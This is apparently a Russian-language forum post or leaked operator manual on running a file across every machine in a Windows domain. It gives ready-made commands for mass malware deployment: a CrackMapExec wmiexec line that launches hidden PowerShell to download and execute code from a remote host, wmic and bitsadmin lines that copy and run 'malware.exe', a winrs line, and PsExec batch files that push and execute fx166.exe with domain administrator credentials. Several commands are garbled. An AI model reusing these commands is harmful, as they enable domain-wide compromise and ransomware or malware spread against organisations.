Как запустить файл на весь домен

[Johny]

Можно сделать через GPO тыц 

 

@echo off
:: server name here:
:: *********************************
Set Srv=PC
:: *********************************
msiexec.exe /i "\\%Srv%\***\Installers\Installer.msi" /qb! /norestart

IF EXIST "C:\TempRip" goto rebootcleanup
goto end

:rebootcleanup
rmdir /s /q "C:\TempRip"
goto end

:end
exit
Запускать по сети, например через wmi:

cme smb 10.0.0.0/24 -d domain -u user -p pass --exec-method wmiexec -X "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};IEX ((new-object net.webclient).downloadstring('https://10.0.0.222:8443/download'))"

exec-methods: 'mmcexec', 'smbexec', 'wmiexec', 'atexec'.
Или так.

wmic /nodeC:\с$\comps.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer malware \\DC01\c$\malware.exe %TEMP%\malware.exe&%TEMP%\malware.exe"
И так же через winrs:

winrs -rC01 "cmd.exe /c C:\malware
Только на домен контроллере.

© copyright

 

[Johny]

СБОР БАТНИКА НА КОПИРОВАНИЕ ФАЙЛА ПО ВСЕМУ ДОМЕНУ
start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe" "C:\windows\temp\" 
СОХРАНЯЕМ КАК "COPY.BAT"

СБОР БАТНИКА НА ЗАПУСК ФАЙЛА ПО ВСЕМУ ДОМЕНУ
start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe
СОХРАНЯЕМ КАК "EXE.BAT"

СБОР БАТНИКА WMI НА КОПИРОВАНИЕ И ЗАПУСК ФАЙЛА ПО ВСЕМУ ДОМЕНУ
start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe"

 

[Johny]

​